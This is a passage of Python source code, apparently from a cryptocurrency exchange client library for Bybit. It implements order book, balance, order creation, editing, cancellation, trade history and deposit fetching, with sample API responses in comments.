method = 'publicLinearGetRecentTradingRecords' if market['linear'] else 'v2PublicGetTradingRecords'
response = getattr(self, method)(self.extend(request, params))
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [
# {
# id: 43785688,
# symbol: 'BTCUSD',
# price: 7786,
# qty: 67,
# side: 'Sell',
# time: '2020-03-11T19:18:30.123Z'
# },
# ],
# time_now: '1583954313.393362'
# }
#
result = self.safe_value(response, 'result', {})
return self.parse_trades(result, market, since, limit)
def parse_order_book(self, orderbook, symbol, timestamp=None, bidsKey='Buy', asksKey='Sell', priceKey='price', amountKey='size'):
bids = []
asks = []
for i in range(0, len(orderbook)):
bidask = orderbook[i]
side = self.safe_string(bidask, 'side')
if side == 'Buy':
bids.append(self.parse_bid_ask(bidask, priceKey, amountKey))
elif side == 'Sell':
asks.append(self.parse_bid_ask(bidask, priceKey, amountKey))
else:
raise ExchangeError(self.id + ' parseOrderBook encountered an unrecognized bidask format: ' + self.json(bidask))
return {
'symbol': symbol,
'bids': self.sort_by(bids, 0, True),
'asks': self.sort_by(asks, 0),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'nonce': None,
}
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.v2PublicGetOrderBookL2(self.extend(request, params))
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [
# {symbol: 'BTCUSD', price: '7767.5', size: 677956, side: 'Buy'},
# {symbol: 'BTCUSD', price: '7767', size: 580690, side: 'Buy'},
# {symbol: 'BTCUSD', price: '7766.5', size: 475252, side: 'Buy'},
# {symbol: 'BTCUSD', price: '7768', size: 330847, side: 'Sell'},
# {symbol: 'BTCUSD', price: '7768.5', size: 97159, side: 'Sell'},
# {symbol: 'BTCUSD', price: '7769', size: 6508, side: 'Sell'},
# ],
# time_now: '1583954829.874823'
# }
#
result = self.safe_value(response, 'result', [])
timestamp = self.safe_timestamp(response, 'time_now')
return self.parse_order_book(result, symbol, timestamp, 'Buy', 'Sell', 'price', 'size')
def fetch_balance(self, params={}):
self.load_markets()
request = {}
coin = self.safe_string(params, 'coin')
code = self.safe_string(params, 'code')
if coin is not None:
request['coin'] = coin
elif code is not None:
currency = self.currency(code)
request['coin'] = currency['id']
response = self.v2PrivateGetWalletBalance(self.extend(request, params))
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: {
# BTC: {
# equity: 0,
# available_balance: 0,
# used_margin: 0,
# order_margin: 0,
# position_margin: 0,
# occ_closing_fee: 0,
# occ_funding_fee: 0,
# wallet_balance: 0,
# realised_pnl: 0,
# unrealised_pnl: 0,
# cum_realised_pnl: 0,
# given_cash: 0,
# service_cash: 0
# }
# },
# time_now: '1583937810.370020',
# rate_limit_status: 119,
# rate_limit_reset_ms: 1583937810367,
# rate_limit: 120
# }
#
result = {
'info': response,
}
balances = self.safe_value(response, 'result', {})
currencyIds = list(balances.keys())
for i in range(0, len(currencyIds)):
currencyId = currencyIds[i]
balance = balances[currencyId]
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'available_balance')
account['used'] = self.safe_string(balance, 'used_margin')
account['total'] = self.safe_string(balance, 'equity')
result[code] = account
return self.parse_balance(result)
def parse_order_status(self, status):
statuses = {
# basic orders
'Created': 'open',
'Rejected': 'rejected', # order is triggered but failed upon being placed
'New': 'open',
'PartiallyFilled': 'open',
'Filled': 'closed',
'Cancelled': 'canceled',
'PendingCancel': 'canceling', # the engine has received the cancellation but there is no guarantee that it will be successful
# conditional orders
'Active': 'open', # order is triggered and placed successfully
'Untriggered': 'open', # order waits to be triggered
'Triggered': 'closed', # order is triggered
# 'Cancelled': 'canceled', # order is cancelled
# 'Rejected': 'rejected', # order is triggered but fail to be placed
'Deactivated': 'canceled', # conditional order was cancelled before triggering
}
return self.safe_string(statuses, status, status)
def parse_time_in_force(self, timeInForce):
timeInForces = {
'GoodTillCancel': 'GTC',
'ImmediateOrCancel': 'IOC',
'FillOrKill': 'FOK',
'PostOnly': 'PO',
}
return self.safe_string(timeInForces, timeInForce, timeInForce)
def parse_order(self, order, market=None):
#
# createOrder
#
# {
# "user_id": 1,
# "order_id": "335fd977-e5a5-4781-b6d0-c772d5bfb95b",
# "symbol": "BTCUSD",
# "side": "Buy",
# "order_type": "Limit",
# "price": 8800,
# "qty": 1,
# "time_in_force": "GoodTillCancel",
# "order_status": "Created",
# "last_exec_time": 0,
# "last_exec_price": 0,
# "leaves_qty": 1,
# "cum_exec_qty": 0, # in contracts, where 1 contract = 1 quote currency unit(USD for inverse contracts)
# "cum_exec_value": 0, # in contract's underlying currency(BTC for inverse contracts)
# "cum_exec_fee": 0,
# "reject_reason": "",
# "order_link_id": "",
# "created_at": "2019-11-30T11:03:43.452Z",
# "updated_at": "2019-11-30T11:03:43.455Z"
# }
#
# fetchOrder
#
# {
# "user_id" : 599946,
# "symbol" : "BTCUSD",
# "side" : "Buy",
# "order_type" : "Limit",
# "price" : "7948",
# "qty" : 10,
# "time_in_force" : "GoodTillCancel",
# "order_status" : "Filled",
# "ext_fields" : {
# "o_req_num" : -1600687220498,
# "xreq_type" : "x_create"
# },
# "last_exec_time" : "1588150113.968422",
# "last_exec_price" : "7948",
# "leaves_qty" : 0,
# "leaves_value" : "0",
# "cum_exec_qty" : 10,
# "cum_exec_value" : "0.00125817",
# "cum_exec_fee" : "-0.00000031",
# "reject_reason" : "",
# "cancel_type" : "",
# "order_link_id" : "",
# "created_at" : "2020-04-29T08:45:24.399146Z",
# "updated_at" : "2020-04-29T08:48:33.968422Z",
# "order_id" : "dd2504b9-0157-406a-99e1-efa522373944"
# }
#
# conditional order
#
# {
# "user_id":##,
# "symbol":"BTCUSD",
# "side":"Buy",
# "order_type":"Market",
# "price":0,
# "qty":10,
# "time_in_force":"GoodTillCancel",
# "stop_order_type":"Stop",
# "trigger_by":"LastPrice",
# "base_price":11833,
# "order_status":"Untriggered",
# "ext_fields":{
# "stop_order_type":"Stop",
# "trigger_by":"LastPrice",
# "base_price":11833,
# "expected_direction":"Rising",
# "trigger_price":12400,
# "close_on_trigger":true,
# "op_from":"api",
# "remark":"x.x.x.x",
# "o_req_num":0
# },
# "leaves_qty":10,
# "leaves_value":0.00080645,
# "reject_reason":null,
# "cross_seq":-1,
# "created_at":"2020-08-21T09:18:48.000Z",
# "updated_at":"2020-08-21T09:18:48.000Z",
# "trigger_price":12400,
# "stop_order_id":"3f3b54b1-3379-42c7-8510-44f4d9915be0"
# }
#
marketId = self.safe_string(order, 'symbol')
market = self.safe_market(marketId, market)
symbol = market['symbol']
feeCurrency = None
timestamp = self.parse8601(self.safe_string(order, 'created_at'))
id = self.safe_string_2(order, 'order_id', 'stop_order_id')
type = self.safe_string_lower(order, 'order_type')
price = self.safe_string(order, 'price')
average = self.safe_string(order, 'average_price')
amount = self.safe_string(order, 'qty')
cost = self.safe_string(order, 'cum_exec_value')
filled = self.safe_string(order, 'cum_exec_qty')
remaining = self.safe_string(order, 'leaves_qty')
marketTypes = self.safe_value(self.options, 'marketTypes', {})
marketType = self.safe_string(marketTypes, symbol)
if market is not None:
if marketType == 'linear':
feeCurrency = market['quote']
else:
feeCurrency = market['base']
lastTradeTimestamp = self.safe_timestamp(order, 'last_exec_time')
if lastTradeTimestamp == 0:
lastTradeTimestamp = None
status = self.parse_order_status(self.safe_string_2(order, 'order_status', 'stop_order_status'))
side = self.safe_string_lower(order, 'side')
feeCostString = self.safe_string(order, 'cum_exec_fee')
feeCost = self.parse_number(Precise.string_abs(feeCostString))
fee = None
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': feeCurrency,
}
clientOrderId = self.safe_string(order, 'order_link_id')
if (clientOrderId is not None) and (len(clientOrderId) < 1):
clientOrderId = None
timeInForce = self.parse_time_in_force(self.safe_string(order, 'time_in_force'))
stopPrice = self.safe_number_2(order, 'trigger_price', 'stop_px')
postOnly = (timeInForce == 'PO')
return self.safe_order2({
'info': order,
'id': id,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'symbol': symbol,
'type': type,
'timeInForce': timeInForce,
'postOnly': postOnly,
'side': side,
'price': price,
'stopPrice': stopPrice,
'amount': amount,
'cost': cost,
'average': average,
'filled': filled,
'remaining': remaining,
'status': status,
'fee': fee,
'trades': None,
}, market)
def fetch_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
# 'order_link_id': 'string', # one of order_id, stop_order_id or order_link_id is required
# regular orders ---------------------------------------------
# 'order_id': id, # one of order_id or order_link_id is required for regular orders
# conditional orders ---------------------------------------------
# 'stop_order_id': id, # one of stop_order_id or order_link_id is required for conditional orders
}
method = None
if market['swap']:
if market['linear']:
method = 'privateLinearGetOrderSearch'
elif market['inverse']:
method = 'v2PrivateGetOrder'
elif market['futures']:
method = 'futuresPrivateGetOrder'
stopOrderId = self.safe_string(params, 'stop_order_id')
if stopOrderId is None:
orderLinkId = self.safe_string(params, 'order_link_id')
if orderLinkId is None:
request['order_id'] = id
else:
if market['swap']:
if market['linear']:
method = 'privateLinearGetStopOrderSearch'
elif market['inverse']:
method = 'v2PrivateGetStopOrder'
elif market['futures']:
method = 'futuresPrivateGetStopOrder'
response = getattr(self, method)(self.extend(request, params))
#
# {
# "ret_code": 0,
# "ret_msg": "OK",
# "ext_code": "",
# "ext_info": "",
# "result": {
# "user_id": 1,
# "symbol": "BTCUSD",
# "side": "Sell",
# "order_type": "Limit",
# "price": "8083",
# "qty": 10,
# "time_in_force": "GoodTillCancel",
# "order_status": "New",
# "ext_fields": {"o_req_num": -308787, "xreq_type": "x_create", "xreq_offset": 4154640},
# "leaves_qty": 10,
# "leaves_value": "0.00123716",
# "cum_exec_qty": 0,
# "reject_reason": "",
# "order_link_id": "",
# "created_at": "2019-10-21T07:28:19.396246Z",
# "updated_at": "2019-10-21T07:28:19.396246Z",
# "order_id": "efa44157-c355-4a98-b6d6-1d846a936b93"
# },
# "time_now": "1571651135.291930",
# "rate_limit_status": 99, # The remaining number of accesses in one minute
# "rate_limit_reset_ms": 1580885703683,
# "rate_limit": 100
# }
#
# conditional orders
#
# {
# "ret_code": 0,
# "ret_msg": "OK",
# "ext_code": "",
# "ext_info": "",
# "result": {
# "user_id": 1,
# "symbol": "BTCUSD",
# "side": "Buy",
# "order_type": "Limit",
# "price": "8000",
# "qty": 1,
# "time_in_force": "GoodTillCancel",
# "order_status": "Untriggered",
# "ext_fields": {},
# "leaves_qty": 1,
# "leaves_value": "0.00013333",
# "cum_exec_qty": 0,
# "cum_exec_value": null,
# "cum_exec_fee": null,
# "reject_reason": "",
# "order_link_id": "",
# "created_at": "2019-12-27T19:56:24.052194Z",
# "updated_at": "2019-12-27T19:56:24.052194Z",
# "order_id": "378a1bbc-a93a-4e75-87f4-502ea754ba36"
# },
# "time_now": "1577476584.386958",
# "rate_limit_status": 99,
# "rate_limit_reset_ms": 1580885703683,
# "rate_limit": 100
# }
#
result = self.safe_value(response, 'result')
return self.parse_order(result, market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
qty = self.amount_to_precision(symbol, amount)
if market['inverse']:
qty = int(qty)
else:
qty = float(qty)
request = {
# orders ---------------------------------------------------------
'side': self.capitalize(side),
'symbol': market['id'],
'order_type': self.capitalize(type),
'qty': qty, # order quantity in USD, integer only
# 'price': float(self.price_to_precision(symbol, price)), # required for limit orders
'time_in_force': 'GoodTillCancel', # ImmediateOrCancel, FillOrKill, PostOnly
# 'take_profit': 123.45, # take profit price, only take effect upon opening the position
# 'stop_loss': 123.45, # stop loss price, only take effect upon opening the position
# 'reduce_only': False, # reduce only, required for linear orders
# when creating a closing order, bybit recommends a True value for
# close_on_trigger to avoid failing due to insufficient available margin
# 'close_on_trigger': False, required for linear orders
# 'order_link_id': 'string', # unique client order id, max 36 characters
# conditional orders ---------------------------------------------
# base_price is used to compare with the value of stop_px, to decide
# whether your conditional order will be triggered by crossing trigger
# price from upper side or lower side, mainly used to identify the
# expected direction of the current conditional order
# 'base_price': 123.45, # required for conditional orders
# 'stop_px': 123.45, # trigger price, required for conditional orders
# 'trigger_by': 'LastPrice', # IndexPrice, MarkPrice
}
priceIsRequired = False
if type == 'limit':
priceIsRequired = True
if priceIsRequired:
if price is not None:
request['price'] = float(self.price_to_precision(symbol, price))
else:
raise ArgumentsRequired(self.id + ' createOrder() requires a price argument for a ' + type + ' order')
clientOrderId = self.safe_string_2(params, 'order_link_id', 'clientOrderId')
if clientOrderId is not None:
request['order_link_id'] = clientOrderId
params = self.omit(params, ['order_link_id', 'clientOrderId'])
stopPx = self.safe_value_2(params, 'stop_px', 'stopPrice')
basePrice = self.safe_value(params, 'base_price')
method = None
if market['swap']:
if market['linear']:
method = 'privateLinearPostOrderCreate'
request['reduce_only'] = False
request['close_on_trigger'] = False
elif market['inverse']:
method = 'v2PrivatePostOrderCreate'
elif market['futures']:
method = 'futuresPrivatePostOrderCreate'
if stopPx is not None:
if basePrice is None:
raise ArgumentsRequired(self.id + ' createOrder() requires both the stop_px and base_price params for a conditional ' + type + ' order')
else:
if market['swap']:
if market['linear']:
method = 'privateLinearPostStopOrderCreate'
elif market['inverse']:
method = 'v2PrivatePostStopOrderCreate'
elif market['futures']:
method = 'futuresPrivatePostStopOrderCreate'
request['stop_px'] = float(self.price_to_precision(symbol, stopPx))
request['base_price'] = float(self.price_to_precision(symbol, basePrice))
params = self.omit(params, ['stop_px', 'stopPrice', 'base_price'])
elif basePrice is not None:
raise ArgumentsRequired(self.id + ' createOrder() requires both the stop_px and base_price params for a conditional ' + type + ' order')
response = getattr(self, method)(self.extend(request, params))
#
# {
# "ret_code": 0,
# "ret_msg": "OK",
# "ext_code": "",
# "ext_info": "",
# "result": {
# "user_id": 1,
# "order_id": "335fd977-e5a5-4781-b6d0-c772d5bfb95b",
# "symbol": "BTCUSD",
# "side": "Buy",
# "order_type": "Limit",
# "price": 8800,
# "qty": 1,
# "time_in_force": "GoodTillCancel",
# "order_status": "Created",
# "last_exec_time": 0,
# "last_exec_price": 0,
# "leaves_qty": 1,
# "cum_exec_qty": 0,
# "cum_exec_value": 0,
# "cum_exec_fee": 0,
# "reject_reason": "",
# "order_link_id": "",
# "created_at": "2019-11-30T11:03:43.452Z",
# "updated_at": "2019-11-30T11:03:43.455Z"
# },
# "time_now": "1575111823.458705",
# "rate_limit_status": 98,
# "rate_limit_reset_ms": 1580885703683,
# "rate_limit": 100
# }
#
# conditional orders
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {
# "user_id": 1,
# "symbol": "BTCUSD",
# "side": "Buy",
# "order_type": "Limit",
# "price": 8000,
# "qty": 1,
# "time_in_force": "GoodTillCancel",
# "stop_order_type": "Stop",
# "trigger_by": "LastPrice",
# "base_price": 7000,
# "order_status": "Untriggered",
# "ext_fields": {
# "stop_order_type": "Stop",
# "trigger_by": "LastPrice",
# "base_price": 7000,
# "expected_direction": "Rising",
# "trigger_price": 7500,
# "op_from": "api",
# "remark": "127.0.01",
# "o_req_num": 0
# },
# "leaves_qty": 1,
# "leaves_value": 0.00013333,
# "reject_reason": null,
# "cross_seq": -1,
# "created_at": "2019-12-27T12:48:24.000Z",
# "updated_at": "2019-12-27T12:48:24.000Z",
# "stop_px": 7500,
# "stop_order_id": "a85cd1c0-a9a4-49d3-a1bd-bab5ebe946d5"
# },
# "ext_info": null,
# "time_now": "1577450904.327654",
# "rate_limit_status": 99,
# "rate_limit_reset_ms": 1577450904335,
# "rate_limit": "100"
# }
#
result = self.safe_value(response, 'result')
return self.parse_order(result, market)
def edit_order(self, id, symbol, type, side, amount=None, price=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' editOrder() requires an symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
# 'order_id': id, # only for non-conditional orders
'symbol': market['id'],
# 'p_r_qty': self.amount_to_precision(symbol, amount), # new order quantity, optional
# 'p_r_price' self.priceToprecision(symbol, price), # new order price, optional
# ----------------------------------------------------------------
# conditional orders
# 'stop_order_id': id, # only for conditional orders
# 'p_r_trigger_price': 123.45, # new trigger price also known as stop_px
}
method = None
if market['swap']:
if market['linear']:
method = 'privateLinearPostOrderReplace'
elif market['inverse']:
method = 'v2PrivatePostOrderReplace'
elif market['futures']:
method = 'futuresPrivatePostOrderReplace'
stopOrderId = self.safe_string(params, 'stop_order_id')
if stopOrderId is not None:
if market['swap']:
if market['linear']:
method = 'privateLinearPostStopOrderReplace'
elif market['inverse']:
method = 'v2PrivatePostStopOrderReplace'
elif market['futures']:
method = 'futuresPrivatePostStopOrderReplace'
request['stop_order_id'] = stopOrderId
params = self.omit(params, ['stop_order_id'])
else:
request['order_id'] = id
if amount is not None:
qty = self.amount_to_precision(symbol, amount)
if market['inverse']:
qty = int(qty)
else:
qty = float(qty)
request['p_r_qty'] = qty
if price is not None:
request['p_r_price'] = float(self.price_to_precision(symbol, price))
response = getattr(self, method)(self.extend(request, params))
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {"order_id": "efa44157-c355-4a98-b6d6-1d846a936b93"},
# "time_now": "1539778407.210858",
# "rate_limit_status": 99, # remaining number of accesses in one minute
# "rate_limit_reset_ms": 1580885703683,
# "rate_limit": 100
# }
#
# conditional orders
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {"stop_order_id": "378a1bbc-a93a-4e75-87f4-502ea754ba36"},
# "ext_info": null,
# "time_now": "1577475760.604942",
# "rate_limit_status": 96,
# "rate_limit_reset_ms": 1577475760612,
# "rate_limit": "100"
# }
#
result = self.safe_value(response, 'result', {})
return {
'info': response,
'id': self.safe_string_2(result, 'order_id', 'stop_order_id'),
'order_id': self.safe_string(result, 'order_id'),
'stop_order_id': self.safe_string(result, 'stop_order_id'),
}
def cancel_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
# 'order_link_id': 'string', # one of order_id, stop_order_id or order_link_id is required
# regular orders ---------------------------------------------
# 'order_id': id, # one of order_id or order_link_id is required for regular orders
# conditional orders ---------------------------------------------
# 'stop_order_id': id, # one of stop_order_id or order_link_id is required for conditional orders
}
method = None
if market['swap']:
if market['linear']:
method = 'privateLinearPostOrderCancel'
elif market['inverse']:
method = 'v2PrivatePostOrderCancel'
elif market['futures']:
method = 'futuresPrivatePostOrderCancel'
stopOrderId = self.safe_string(params, 'stop_order_id')
if stopOrderId is None:
orderLinkId = self.safe_string(params, 'order_link_id')
if orderLinkId is None:
request['order_id'] = id
else:
if market['swap']:
if market['linear']:
method = 'privateLinearPostStopOrderCancel'
elif market['inverse']:
method = 'v2PrivatePostStopOrderCancel'
elif market['futures']:
method = 'futuresPrivatePostStopOrderCancel'
response = getattr(self, method)(self.extend(request, params))
result = self.safe_value(response, 'result', {})
return self.parse_order(result, market)
def cancel_all_orders(self, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelAllOrders() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
options = self.safe_value(self.options, 'cancelAllOrders', {})
defaultMethod = None
if market['swap']:
if market['linear']:
defaultMethod = 'privateLinearPostOrderCancelAll'
elif market['inverse']:
defaultMethod = 'v2PrivatePostOrderCancelAll'
elif market['futures']:
defaultMethod = 'futuresPrivatePostOrderCancelAll'
method = self.safe_string(options, 'method', defaultMethod)
response = getattr(self, method)(self.extend(request, params))
result = self.safe_value(response, 'result', [])
return self.parse_orders(result, market)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {
# 'order_id': 'string'
# 'order_link_id': 'string', # unique client order id, max 36 characters
# 'symbol': market['id'], # default BTCUSD
# 'order': 'desc', # asc
# 'page': 1,
# 'limit': 20, # max 50
# 'order_status': 'Created,New'
# conditional orders ---------------------------------------------
# 'stop_order_id': 'string',
# 'stop_order_status': 'Untriggered',
}
market = None
if symbol is not None:
market = self.market(symbol)
request['symbol'] = market['id']
if limit is not None:
request['limit'] = limit
options = self.safe_value(self.options, 'fetchOrders', {})
defaultType = self.safe_string(self.options, 'defaultType', 'linear')
marketTypes = self.safe_value(self.options, 'marketTypes', {})
marketType = self.safe_string(marketTypes, symbol, defaultType)
defaultMethod = None
marketDefined = (market is not None)
linear = (marketDefined and market['linear']) or (marketType == 'linear')
inverse = (marketDefined and market['swap'] and market['inverse']) or (marketType == 'inverse')
futures = (marketDefined and market['futures']) or (marketType == 'futures')
if linear:
defaultMethod = 'privateLinearGetOrderList'
elif inverse:
defaultMethod = 'v2PrivateGetOrderList'
elif futures:
defaultMethod = 'futuresPrivateGetOrderList'
query = params
if ('stop_order_id' in params) or ('stop_order_status' in params):
stopOrderStatus = self.safe_value(params, 'stop_order_status')
if stopOrderStatus is not None:
if isinstance(stopOrderStatus, list):
stopOrderStatus = ','.join(stopOrderStatus)
request['stop_order_status'] = stopOrderStatus
query = self.omit(params, 'stop_order_status')
if linear:
defaultMethod = 'privateLinearGetStopOrderList'
elif inverse:
defaultMethod = 'v2PrivateGetStopOrderList'
elif futures:
defaultMethod = 'futuresPrivateGetStopOrderList'
method = self.safe_string(options, 'method', defaultMethod)
response = getattr(self, method)(self.extend(request, query))
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {
# "current_page": 1,
# "last_page": 6,
# "data": [
# {
# "user_id": 1,
# "symbol": "BTCUSD",
# "side": "Sell",
# "order_type": "Market",
# "price": 7074,
# "qty": 2,
# "time_in_force": "ImmediateOrCancel",
# "order_status": "Filled",
# "ext_fields": {
# "close_on_trigger": True,
# "orig_order_type": "BLimit",
# "prior_x_req_price": 5898.5,
# "op_from": "pc",
# "remark": "127.0.0.1",
# "o_req_num": -34799032763,
# "xreq_type": "x_create"
# },
# "last_exec_time": "1577448481.696421",
# "last_exec_price": 7070.5,
# "leaves_qty": 0,
# "leaves_value": 0,
# "cum_exec_qty": 2,
# "cum_exec_value": 0.00028283,
# "cum_exec_fee": 0.00002,
# "reject_reason": "NoError",
# "order_link_id": "",
# "created_at": "2019-12-27T12:08:01.000Z",
# "updated_at": "2019-12-27T12:08:01.000Z",
# "order_id": "f185806b-b801-40ff-adec-52289370ed62"
# }
# ]
# },
# "ext_info": null,
# "time_now": "1577448922.437871",
# "rate_limit_status": 98,
# "rate_limit_reset_ms": 1580885703683,
# "rate_limit": 100
# }
#
# conditional orders
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {
# "current_page": 1,
# "last_page": 1,
# "data": [
# {
# "user_id": 1,
# "stop_order_status": "Untriggered",
# "symbol": "BTCUSD",
# "side": "Buy",
# "order_type": "Limit",
# "price": 8000,
# "qty": 1,
# "time_in_force": "GoodTillCancel",
# "stop_order_type": "Stop",
# "trigger_by": "LastPrice",
# "base_price": 7000,
# "order_link_id": "",
# "created_at": "2019-12-27T12:48:24.000Z",
# "updated_at": "2019-12-27T12:48:24.000Z",
# "stop_px": 7500,
# "stop_order_id": "a85cd1c0-a9a4-49d3-a1bd-bab5ebe946d5"
# },
# ]
# },
# "ext_info": null,
# "time_now": "1577451658.755468",
# "rate_limit_status": 599,
# "rate_limit_reset_ms": 1577451658762,
# "rate_limit": 600
# }
#
result = self.safe_value(response, 'result', {})
data = self.safe_value(result, 'data', [])
return self.parse_orders(data, market, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
defaultStatuses = [
'Rejected',
'Filled',
'Cancelled',
# conditional orders
# 'Active',
# 'Triggered',
# 'Cancelled',
# 'Rejected',
# 'Deactivated',
]
options = self.safe_value(self.options, 'fetchClosedOrders', {})
status = self.safe_value(options, 'order_status', defaultStatuses)
if isinstance(status, list):
status = ','.join(status)
request = {}
stopOrderStatus = self.safe_value(params, 'stop_order_status')
if stopOrderStatus is None:
request['order_status'] = status
else:
request['stop_order_status'] = stopOrderStatus
return self.fetch_orders(symbol, since, limit, self.extend(request, params))
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
defaultStatuses = [
'Created',
'New',
'PartiallyFilled',
'PendingCancel',
# conditional orders
# 'Untriggered',
]
options = self.safe_value(self.options, 'fetchOpenOrders', {})
status = self.safe_value(options, 'order_status', defaultStatuses)
if isinstance(status, list):
status = ','.join(status)
request = {}
stopOrderStatus = self.safe_value(params, 'stop_order_status')
if stopOrderStatus is None:
request['order_status'] = status
else:
request['stop_order_status'] = stopOrderStatus
return self.fetch_orders(symbol, since, limit, self.extend(request, params))
def fetch_order_trades(self, id, symbol=None, since=None, limit=None, params={}):
request = {
'order_id': id,
}
return self.fetch_my_trades(symbol, since, limit, self.extend(request, params))
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {
# 'order_id': 'f185806b-b801-40ff-adec-52289370ed62', # if not provided will return user's trading records
# 'symbol': market['id'],
# 'start_time': int(since / 1000),
# 'page': 1,
# 'limit' 20, # max 50
}
market = None
if symbol is None:
orderId = self.safe_string(params, 'order_id')
if orderId is None:
raise ArgumentsRequired(self.id + ' fetchMyTrades() requires a symbol argument or an order_id param')
else:
request['order_id'] = orderId
params = self.omit(params, 'order_id')
else:
market = self.market(symbol)
request['symbol'] = market['id']
if since is not None:
request['start_time'] = since
if limit is not None:
request['limit'] = limit # default 20, max 50
defaultType = self.safe_string(self.options, 'defaultType', 'linear')
marketTypes = self.safe_value(self.options, 'marketTypes', {})
marketType = self.safe_string(marketTypes, symbol, defaultType)
marketDefined = (market is not None)
linear = (marketDefined and market['linear']) or (marketType == 'linear')
inverse = (marketDefined and market['swap'] and market['inverse']) or (marketType == 'inverse')
futures = (marketDefined and market['futures']) or (marketType == 'futures')
method = None
if linear:
method = 'privateLinearGetTradeExecutionList'
elif inverse:
method = 'v2PrivateGetExecutionList'
elif futures:
method = 'futuresPrivateGetExecutionList'
response = getattr(self, method)(self.extend(request, params))
#
# inverse
#
# {
# "ret_code": 0,
# "ret_msg": "OK",
# "ext_code": "",
# "ext_info": "",
# "result": {
# "order_id": "Abandonednot !", # Abandonednot !
# "trade_list": [
# {
# "closed_size": 0,
# "cross_seq": 277136382,
# "exec_fee": "0.0000001",
# "exec_id": "256e5ef8-abfe-5772-971b-f944e15e0d68",
# "exec_price": "8178.5",
# "exec_qty": 1,
# "exec_time": "1571676941.70682",
# "exec_type": "Trade", #Exec Type Enum
# "exec_value": "0.00012227",
# "fee_rate": "0.00075",
# "last_liquidity_ind": "RemovedLiquidity", #Liquidity Enum
# "leaves_qty": 0,
# "nth_fill": 2,
# "order_id": "7ad50cb1-9ad0-4f74-804b-d82a516e1029",
# "order_link_id": "",
# "order_price": "8178",
# "order_qty": 1,
# "order_type": "Market", #Order Type Enum
# "side": "Buy", #Side Enum
# "symbol": "BTCUSD", #Symbol Enum
# "user_id": 1
# }
# ]
# },
# "time_now": "1577483699.281488",
# "rate_limit_status": 118,
# "rate_limit_reset_ms": 1577483699244737,
# "rate_limit": 120
# }
#
# linear
#
# {
# "ret_code":0,
# "ret_msg":"OK",
# "ext_code":"",
# "ext_info":"",
# "result":{
# "current_page":1,
# "data":[
# {
# "order_id":"b59418ec-14d4-4ef9-b9f4-721d5d576974",
# "order_link_id":"",
# "side":"Sell",
# "symbol":"BTCUSDT",
# "exec_id":"0327284d-faec-5191-bd89-acc5b4fafda9",
# "price":0.5,
# "order_price":0.5,
# "order_qty":0.01,
# "order_type":"Market",
# "fee_rate":0.00075,
# "exec_price":9709.5,
# "exec_type":"Trade",
# "exec_qty":0.01,
# "exec_fee":0.07282125,
# "exec_value":97.095,
# "leaves_qty":0,
# "closed_size":0.01,
# "last_liquidity_ind":"RemovedLiquidity",
# "trade_time":1591648052,
# "trade_time_ms":1591648052861
# }
# ]
# },
# "time_now":"1591736501.979264",
# "rate_limit_status":119,
# "rate_limit_reset_ms":1591736501974,
# "rate_limit":120
# }
#
result = self.safe_value(response, 'result', {})
trades = self.safe_value_2(result, 'trade_list', 'data', [])
return self.parse_trades(trades, market, since, limit)
def fetch_deposits(self, code=None, since=None, limit=None, params={}):
self.load_markets()
request = {
# 'coin': currency['id'],
# 'currency': currency['id'], # alias
# 'start_date': self.iso8601(since),
# 'end_date': self.iso8601(till),
'wallet_fund_type': 'Deposit', # Deposit, Withdraw, RealisedPNL, Commission, Refund, Prize, ExchangeOrderWithdraw, ExchangeOrderDeposit
# 'page': 1,
# 'limit': 20, # max 50
}
currency = None
if code is not None:
currency = self.currency(code)
request['coin'] = currency['id']
if since is not None:
request['start_date'] = self.yyyymmdd(since)
if limit is not None:
request['limit'] = limit
response = self.v2PrivateGetWalletFundRecords(self.extend(request, params))
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {
# "data": [
# {
# "id": 234467,
# "user_id": 1,
# "coin": "BTC",
# "wallet_id": 27913,
# "type": "Realized P&L",
# "amount": "-0.00000006",
# "tx_id": "",
# "address": "BTCUSD",
# "wallet_balance": "0.03000330",
# "exec_time": "2019-12-09T00:00:25.000Z",
# "cross_seq": 0
# }
# ]
# },
# "ext_info": null,
# "time_now": "1577481867.115552",
# "rate_limit_status": 119,
# "rate_limit_reset_ms": 1577481867122,
# "rate_limit": 120
# }
#
result = self.safe_value(response, 'result', {})
data = self.safe_value(result, 'data', [])
